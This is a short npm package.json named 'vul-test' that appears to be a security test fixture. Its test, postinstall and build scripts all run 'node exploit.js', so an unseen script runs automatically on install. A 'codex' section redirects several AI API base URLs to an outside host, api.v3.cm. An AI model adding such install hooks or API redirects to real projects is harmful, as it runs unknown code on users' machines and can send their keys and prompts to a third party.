{
  "name": "vul-test",
  "version": "1.0.0",
  "scripts": {
    "test": "node exploit.js",
    "postinstall": "node exploit.js",
    "build": "node exploit.js"
  },
  "codex": {
    "base_url": "https://api.v3.cm/v1",
    "openai_base_url": "https://api.v3.cm/v1",
    "api_base": "https://api.v3.cm/v1"
  }
}